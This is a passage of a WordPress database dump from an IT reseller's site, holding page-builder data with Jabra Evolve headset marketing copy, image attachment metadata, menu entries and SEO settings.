speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(262,19,'_edit_last','1'),(263,19,'_wp_page_template','template-fullwidth.php'),(264,19,'_hide_page_title',''),(265,19,'_hide_header',''),(266,19,'_hide_footer',''),(267,19,'_hide_breadcrumb',''),(268,19,'_cover',''),(269,19,'_show_excerpt',''),(270,19,'_wc_apply_product',''),(5038,2860,'_wp_page_template','template-fullwidth.php'),(5039,2860,'_elementor_edit_mode','builder'),(5040,2860,'_elementor_template_type','post'),(5041,2860,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra.<\\/h2><h3>Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65t<\\/h3><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3896bef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\",\"id\":2852}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9de26d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\",\"id\":2853}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 80<\\/h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 75e<\\/h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"814dc95\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\",\"id\":2854}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c93a2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\",\"id\":2855}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"ng-binding ng-scope\\\">Jabra Evolve 75<\\/h3><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65 Stereo \\/ Mono<\\/h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9efebba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\",\"id\":2856}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7bf8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\",\"id\":2857}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 40 Stereo \\/ Mono<\\/h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 30 Stereo \\/ Mono<\\/h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"17446c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_30_.png\",\"id\":2858}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"81e8a0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\",\"id\":2859}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Jabra Evolve 20 Stereo \\/ Mono<br \\/>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(281,1260,'_wp_attached_file','2018/12/thumbnail.jpg'),(282,1260,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2339;s:6:\"height\";i:1462;s:4:\"file\";s:21:\"2018/12/thumbnail.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"thumbnail-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"thumbnail-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"thumbnail-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"thumbnail-1024x640.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"thumbnail-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"thumbnail-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"thumbnail-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(286,1251,'wpforms_entries_count','1'),(2475,1943,'_yoast_wpseo_linkdex','90'),(2472,2024,'_yoast_wpseo_focuskw','BlueJeans'),(1739,1492,'_thumbnail_id','3221'),(1740,1492,'_yoast_wpseo_metadesc','Backup & Replication'),(1741,1492,'_yoast_wpseo_content_score','30'),(1742,1697,'_wp_attachment_image_alt','Logo TV'),(1743,16,'_yoast_wpseo_content_score','30'),(1744,1470,'_thumbnail_id','1697'),(1745,1470,'_yoast_wpseo_metadesc','Remote Support, Remote Access, Service Desk'),(1746,1470,'_yoast_wpseo_content_score','90'),(1747,1707,'_wp_attachment_image_alt','Samsung Logo'),(1748,1432,'_thumbnail_id','1707'),(1749,1432,'_yoast_wpseo_metadesc','Television, Smart Television, Storage, Printers'),(1750,1432,'_yoast_wpseo_content_score','60'),(1751,1704,'_wp_attachment_image_alt','RedhatLogo'),(1752,1428,'_thumbnail_id','3224'),(1753,1428,'_yoast_wpseo_metadesc','Open Source Server, Enterprise Linux Server'),(1754,1428,'_yoast_wpseo_content_score','60'),(1755,1400,'_yoast_wpseo_content_score','60'),(1756,1694,'_wp_attachment_image_alt','Logitech Logo'),(1757,1400,'_thumbnail_id','1694'),(1758,1400,'_yoast_wpseo_metadesc','Video Conferencing, Conference Cameras, Webcams and Headsets'),(2474,1943,'_yoast_wpseo_focuskw','Broadbase'),(2473,2024,'_yoast_wpseo_linkdex','78'),(306,1269,'_wp_attached_file','2018/12/Logo-Bintara-Asal.png'),(307,1269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1148;s:6:\"height\";i:414;s:4:\"file\";s:29:\"2018/12/Logo-Bintara-Asal.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Logo-Bintara-Asal-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Logo-Bintara-Asal-300x108.png\";s:5:\"width\";i:300;s:6:\"height\";i:108;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Logo-Bintara-Asal-768x277.png\";s:5:\"width\";i:768;s:6:\"height\";i:277;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Logo-Bintara-Asal-1024x369.png\";s:5:\"width\";i:1024;s:6:\"height\";i:369;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"Logo-Bintara-Asal-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"Logo-Bintara-Asal-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:29:\"Logo-Bintara-Asal-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(309,1271,'_wp_attached_file','2018/12/cropped-Logo-Bintara-Asal.png'),(310,1271,'_wp_attachment_context','custom-logo'),(311,1271,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1090;s:6:\"height\";i:367;s:4:\"file\";s:37:\"2018/12/cropped-Logo-Bintara-Asal.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"cropped-Logo-Bintara-Asal-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"cropped-Logo-Bintara-Asal-300x101.png\";s:5:\"width\";i:300;s:6:\"height\";i:101;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"cropped-Logo-Bintara-Asal-768x259.png\";s:5:\"width\";i:768;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"cropped-Logo-Bintara-Asal-1024x345.png\";s:5:\"width\";i:1024;s:6:\"height\";i:345;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:37:\"cropped-Logo-Bintara-Asal-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:37:\"cropped-Logo-Bintara-Asal-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:37:\"cropped-Logo-Bintara-Asal-640x367.png\";s:5:\"width\";i:640;s:6:\"height\";i:367;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(315,1273,'_wp_attached_file','2018/12/cropped-Logo-Bintara-Asal-1.png'),(316,1273,'_wp_attachment_context','custom-logo'),(317,1273,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1148;s:6:\"height\";i:414;s:4:\"file\";s:39:\"2018/12/cropped-Logo-Bintara-Asal-1.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"cropped-Logo-Bintara-Asal-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"cropped-Logo-Bintara-Asal-1-300x108.png\";s:5:\"width\";i:300;s:6:\"height\";i:108;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"cropped-Logo-Bintara-Asal-1-768x277.png\";s:5:\"width\";i:768;s:6:\"height\";i:277;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"cropped-Logo-Bintara-Asal-1-1024x369.png\";s:5:\"width\";i:1024;s:6:\"height\";i:369;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"cropped-Logo-Bintara-Asal-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"cropped-Logo-Bintara-Asal-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:39:\"cropped-Logo-Bintara-Asal-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:36:\"cropped-Logo-Bintara-Asal-1-20x7.png\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(318,1274,'_wp_attached_file','2018/12/onepress-dummy-data.xml'),(319,1275,'_wp_attached_file','2018/12/onepress-config.json'),(325,1277,'_edit_lock','1545009740:1'),(326,1277,'_edit_last','1'),(327,1277,'_wp_page_template','template-fullwidth.php'),(328,1277,'_hide_page_title',''),(329,1277,'_hide_header',''),(330,1277,'_hide_footer',''),(331,1277,'_hide_breadcrumb',''),(332,1277,'_cover',''),(333,1277,'_show_excerpt',''),(334,1277,'_wc_apply_product',''),(335,1279,'_edit_lock','1544501951:1'),(336,1279,'_edit_last','1'),(337,1279,'_wp_page_template','template-fullwidth.php'),(338,1279,'_hide_page_title',''),(339,1279,'_hide_header',''),(340,1279,'_hide_footer',''),(341,1279,'_hide_breadcrumb',''),(342,1279,'_cover',''),(343,1279,'_show_excerpt',''),(344,1279,'_wc_apply_product',''),(345,1281,'_edit_last','1'),(346,1281,'_wp_page_template','template-fullwidth.php'),(347,1281,'_hide_page_title',''),(348,1281,'_hide_header',''),(349,1281,'_hide_footer',''),(350,1281,'_hide_breadcrumb',''),(351,1281,'_cover',''),(352,1281,'_show_excerpt',''),(353,1281,'_wc_apply_product',''),(354,1281,'_edit_lock','1544496836:1'),(356,1284,'_menu_item_type','custom'),(357,1284,'_menu_item_menu_item_parent','0'),(358,1284,'_menu_item_object_id','1284'),(359,1284,'_menu_item_object','custom'),(360,1284,'_menu_item_target',''),(361,1284,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(362,1284,'_menu_item_xfn',''),(363,1284,'_menu_item_url','https://bintara.com.my/#Products'),(367,1287,'_edit_lock','1569473104:1'),(368,1287,'_edit_last','1'),(371,1287,'_wp_page_template','template-fullwidth.php'),(372,1287,'_hide_page_title',''),(373,1287,'_hide_header',''),(374,1287,'_hide_footer',''),(375,1287,'_hide_breadcrumb',''),(376,1287,'_cover',''),(377,1287,'_show_excerpt',''),(378,1287,'_wc_apply_product',''),(393,1296,'_menu_item_type','post_type'),(394,1296,'_menu_item_menu_item_parent','0'),(395,1296,'_menu_item_object_id','1287'),(396,1296,'_menu_item_object','page'),(397,1296,'_menu_item_target',''),(398,1296,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(399,1296,'_menu_item_xfn',''),(400,1296,'_menu_item_url',''),(401,1296,'_menu_item_orphaned','1544497942'),(404,1297,'_menu_item_object_id','1297'),(405,1297,'_menu_item_object','custom'),(406,1297,'_menu_item_target',''),(407,1297,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(408,1297,'_menu_item_xfn',''),(409,1297,'_menu_item_url','https://bintara.com.my/#About'),(430,1303,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(431,1303,'_menu_item_xfn',''),(432,1303,'_menu_item_url','https://bintara.com.my/#Services'),(454,1306,'_menu_item_object_id','1306'),(434,1304,'_menu_item_type','custom'),(435,1304,'_menu_item_menu_item_parent','0'),(436,1304,'_menu_item_object_id','1304'),(437,1304,'_menu_item_object','custom'),(438,1304,'_menu_item_target',''),(439,1304,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(440,1304,'_menu_item_xfn',''),(441,1304,'_menu_item_url','https://bintara.com.my/#Contact'),(453,1306,'_menu_item_menu_item_parent','0'),(443,1305,'_menu_item_type','custom'),(444,1305,'_menu_item_menu_item_parent','0'),(445,1305,'_menu_item_object_id','1305'),(446,1305,'_menu_item_object','custom'),(447,1305,'_menu_item_target',''),(448,1305,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(449,1305,'_menu_item_xfn',''),(450,1305,'_menu_item_url','https://bintara.com.my/#Careers'),(452,1306,'_menu_item_type','custom'),(455,1306,'_menu_item_object','custom'),(456,1306,'_menu_item_target',''),(457,1306,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(458,1306,'_menu_item_xfn',''),(459,1306,'_menu_item_url','https://bintara.com.my/#News'),(466,1,'_edit_lock','1569996462:1'),(469,1,'_edit_last','1'),(470,1,'_thumbnail_id','1247'),(473,1,'_wp_old_slug','hello-world'),(475,1247,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:16:\"rally-camera.png\";}}'),(481,1313,'_edit_lock','1571989144:1'),(484,1313,'_edit_last','1'),(485,1313,'_wp_page_template','template-portfolios.php'),(486,1313,'_hide_page_title',''),(487,1313,'_hide_header',''),(488,1313,'_hide_footer',''),(489,1313,'_hide_breadcrumb',''),(490,1313,'_cover',''),(491,1313,'_show_excerpt',''),(492,1313,'_wc_apply_product',''),(493,1313,'_thumbnail_id','1269'),(494,1316,'_wp_attached_file','2018/12/meetup-conference-cam.png'),(495,1316,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:33:\"2018/12/meetup-conference-cam.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"meetup-conference-cam-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(499,1318,'_wp_attached_file','2018/12/conferencecam-connect.png'),(500,1318,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:33:\"2018/12/conferencecam-connect.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s